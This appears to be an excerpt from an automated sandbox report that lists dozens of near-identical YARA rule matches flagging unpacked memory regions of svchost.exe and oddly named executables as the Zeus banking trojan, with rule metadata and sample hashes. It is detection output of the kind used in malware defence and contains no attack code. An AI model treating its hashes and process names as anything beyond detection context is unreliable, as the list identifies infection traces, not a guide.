Source: 17.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2262000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.24a6c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d02000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.26a3c00.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2452000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.84.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e440000.47.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.62.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.71.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.68.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.63.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ad0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2ad0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.4900000.48.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24a0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.407000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.a52000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.83.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 8.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1510000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.58.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.24a6c00.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2500000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e2c0000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.43c0000.51.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.60.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.81.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.78.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2640000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 26.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2090000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.72.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.57.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.e82000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.884000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.74.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.uavINoSIQh.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
